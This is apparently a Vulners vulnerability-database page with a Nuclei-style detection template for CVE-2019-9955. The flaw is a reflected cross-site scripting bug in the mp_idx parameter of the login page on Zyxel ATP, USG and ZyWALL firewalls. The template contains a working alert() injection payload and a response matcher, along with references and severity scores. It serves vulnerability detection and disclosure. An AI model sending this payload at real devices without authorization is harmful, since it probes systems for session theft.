Vulners
Lucene search
Zyxel - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting | 16 Apr 201900:00 | – | zdt |
 | Cross-Site Scripting Vulnerabilities in Multiple ZyXEL Products | 17 Apr 201900:00 | – | cnvd |
 | CVE-2019-9955 | 22 Apr 201919:38 | – | cve |
 | CVE-2019-9955 | 22 Apr 201919:38 | – | cvelist |
 | CVE-2019-9955 | 22 Apr 201920:29 | – | nvd |
 | Zyxel ZyWall Cross Site Scripting | 16 Apr 201900:00 | – | packetstorm |
 | Cross site scripting | 22 Apr 201920:29 | – | prion |
id: CVE-2019-9955
info:
name: Zyxel - Cross-Site Scripting
author: pdteam
severity: medium
description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
impact: |
Attackers can execute scripts in the victim's browser, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
remediation: |
Apply the latest firmware updates provided by Zyxel to fix the reflected cross-site scripting vulnerability.
reference:
- http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
- https://www.exploit-db.com/exploits/46706/
- https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
- https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2019-9955
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-9955
cwe-id: CWE-79
epss-score: 0.10697
epss-percentile: 0.93454
cpe: cpe:2.3:o:zyxel:atp200_firmware:4.31:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zyxel
product: atp200_firmware
tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"
matchers:
- type: word
part: body
words:
- "\";alert('1');//"
- "<title>Welcome</title>"
condition: and
# digest: 490a004630440220192223fcac5c5eb4f94a80e8169bdf2304319da40d4b1d03accf668f210f9c23022077cbe6e85917fa1f6f4ea7dc177670ace5d5bccdb567877aad189467a4ca0602:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 36.1
EPSS0.10697